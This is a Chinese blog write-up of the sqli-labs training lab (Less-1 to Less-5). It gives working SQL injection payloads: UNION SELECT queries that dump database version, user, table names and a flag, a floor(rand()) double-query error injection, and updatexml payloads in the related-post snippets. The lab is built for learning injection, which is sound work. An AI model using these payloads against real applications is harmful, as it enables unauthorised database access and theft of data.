sql-labs1

最新推荐文章于 2024-04-29 23:47:34 发布
最新推荐文章于 2024-04-29 23:47:34 发布
阅读量297 收藏 2
点赞数
分类专栏: sql注入 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44022113/article/details/114239082
版权

前言

在线靶机地址:https://buuoj.cn/challenges#sqli-labs

less-1

​ 首先说明sql注入的大致步骤:

  • 判断注入类型。如整型字符型注入等。
  • 判断列数
  • 判断数据的回显位
  • 构造sql语句

​ 根据题目提示,说明是一个单引号注入题目,构造一个带单引号的语句?id=1',发现数据库报错
在这里插入图片描述

​ 通过后面的报错语句1'' LIMIT 0,1的分析,我们的单引号被数据库解析,那么说明我们也可以使用连接查询union插入我们想要查询的语句。

​ 推出数据库的查询的部分语句可能为where id = '$id'LIMIT 0,1,那么通过构造闭合?id=1' [这里添加语句] --+添加自己想要语句,语句后面的--+作用是将后面的其他语句注释掉。

​ 首先是判断字段个数:?id=1' order by 1 --+,页面显示正常,直到尝试?id=1' order by 4 --+发现数据库报错

在这里插入图片描述

​ 说明数据库的字段值只有四个。

​ 接下来测试数据的回显位,构造语句?id=' union select 1,2,3 --+,这里需要注意的有,前面id的查询一定是要不存在的,因为数据库只会回显第一条查询的数据,如果第一条语句查询成功则后面union构造的语句就不会显示;union连接查询语句后面查询的字段数需要和前面的字段数相等,详细用法可以自行查询。

​ 执行后页面显示。

https://s1.ax1x.com/2020/11/04/BgZAeS.png
​ 说明查询语句的2,3是回显位,之后就可以将查询的语句进行替换。如:

​ 获取数据库版本,数据库路径,当前用户,当前数据库:
?id=' union select 1,concat_ws('_',user(),version(),database()),@@basedir --+

页面显示

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tM4lgQJK-1614514071048)(https://s1.ax1x.com/2020/11/04/BgZbfs.png)]

​ 利用元数据库来爆表、爆数据

?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

​ 之后大家可以自行发挥。

flag的话我做的题是在ctftraining.flag表中,答案在:?id=' union select 1,flag,3 from ctftraining.flag --+

less-2

​ 第二题看题目名称intiger based知大意,是id的数据类型由字符型变成了数字类型,这次就不使用单引号直接构造语句,和第一题差不多。

less-3

​ 看标题Single quotes with twist,是在前面题的基础上加上了括号包裹,所以语句就成了where id = ('id')所以我们闭合的方式也要改变。附源码

在这里插入图片描述

less-4

​ 标题Double Quotes,说明是个引号注入,把前面题的单引号改成双引号构成闭合即可。

less-5

​ 标题Double Injection-Single Quotes,很明显提示是单引号,然后套用前面的方法, 发现这次题目变了,不管输入啥页面只显示一个You are in...........,但是数据库报错还是会显示,只要数据库错误还能显示,我们就可以是用一个新的技术把数据显示在错误信息上。

​ 双查询注入也是我第一次听,贴一个讲大致原理的帖子:点我

​ 构造语句:

?id=' union select 1,2,3 from (select 1,count(*),concat_ws('____________',floor(rand()*2),concat_ws('********',version(),database()))a from information_schema.tables group by a)b --+

​ 讲一下CONCAT_WS(separator,str1,str2,…)函数的用法:把str1str2连接起来,并使用separator做分隔符。

深海神奇舰舰长
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs
03-07
sql-labs
sqli-labs less-6
阿刁〇的博客
03-31 118
文章目录sqli-labs less-6* 判断注入* 判断列数* 查询详细信息 sqli-labs less-6 本关和第5关类似,可以参考第5关 * 判断注入 ?id=1 回显信息为You are in………… ?id=1' 回显正常 ?id=1" 回显错误 ?id=1") 回显正常 故注入类型为字符型,双引号闭合 * 判断列数 ?id=1" order by 3 --+ 回显正常 ?id=1" order by 4 --+ 回显错误 故列数为3 * 查询详细信息 本关同第五关相似,依然采
sqli-labs靶场通关技巧(46-65)
ldzhhh的博客
08-03 411
Less46 Order by注入,利用报错注入可以爆出数据库信息 暴库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0)); 爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0)); 爆字段:?sort=1
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-LABS Page-1(Basic Challenges) 1-22关
m0_63138919的博客
07-24 295
本文为SQLi-LABS Page-1(Basic Challenges) 1-20关的解题方法
ctfshow web入门 sqli-labs(持续更新)
Lum1n0us's Blog
04-14 1715
文章目录web517-1web518-2web519-3web520-4web521-5web522-6web523-7web524-8web525-9web526-10web527-11web528-12web529-13web530-14web531-15web532-16web533-17web534-18web535-19web536-20web537-21web538-22web539-23 web517-1 ctfshow的sqli-labs和本地搭建最大的不同,就是show的flag不在当前的
CTFshow-sqli-labs
Leo8283的博客
04-20 624
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
Sqli-Labs(1-10)通关笔记
weixin_54894046的博客
04-02 4407
靶场环境 buuctf的靶场 来到第一关 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这关要干嘛QAQ 目标:得到数据库名字 表名 字段名 数据 输入?id=1'%23 原理用自己添加的单引号闭合 然后用#注释掉后面的单引号 不过#要用url编码成%
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 7770
sql注入集合
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
sqli-labs学习(less-1-less-4)
weixin_30908649的博客
11-25 176
学习sqli-labs之前先介绍一些函数,以便于下面的payload看的懂 group_concat函数 将查询出来的多个结果连接成一个字符串结果,用于在一个回显显示多个结果 同理的还有 concat_ws() limit star,size用法 start:从第几条记录开始。 size:读取几条记录。 sqli-lab-1 关键代码 $sql="SELE...
Sqli-Labs~1 详解
Cy610610的博客
12-04 1005
sqli-labs第一关,手把手教学,包学包会!内含informations_schema数据库解释说明等相关内容
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6221
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
sqli-labs第一关详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2106
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
【封神台】Sql-Labs wp
孤桜懶契
08-15 455
前言 掌控安全里面的靶场Sql-Labs,练练手! 环境:http://inject2.lab.aqlab.cn:81/ pass-01 $username = ''; $password = ''; @$id = $_GET['id']; @$sql = 'select *from user where id='.$id; mysqli_select_db($conn,'****');// 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($
青少年CTF平台---sqli-labs
t235336456的博客
11-30 408
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
【课堂练习】
最新发布
JacksonLeo的博客
04-29 535
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面(https://github.com/Audi-1/sqli-labs)下载最新的 ZIP 文件,并将其解压缩到您的 Web 服务器的文档根目录中。 3. 在 MySQL 数据库中创建一个新的数据库,用于存储 SQL-Labs 的数据。您可以使用以下命令在 MySQL 命令行中创建一个新数据库: ``` CREATE DATABASE sqli; ``` 4. 导入 SQL-Labs 的数据库结构。进入到您解压缩的 SQL-Labs 文件夹中,找到 `db-structure.sql` 文件,并使用以下命令导入数据库结构: ``` mysql -u your_username -p sqli < db-structure.sql ``` 替换 `your_username` 为您的 MySQL 用户名,并输入密码进行验证。 5. 配置 SQL-Labs。进入 SQL-Labs 文件夹中的 `db.php` 文件,按照注释中的提示修改数据库连接信息,包括主机名、用户名、密码和数据库名称。 ``` $host = 'localhost'; $user = 'your_username'; $password = 'your_password'; $db = 'sqli'; ``` 6. 启动 Web 服务器,并在浏览器中访问 SQL-Labs。在浏览器中输入 `http://localhost/sql-labs/`,您应该能够看到 SQL-Labs 的登录页面。 现在,您已经成功安装并配置了 SQL-Labs。请确保仔细阅读项目的文档,了解如何正确使用和利用 SQL-Labs 的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值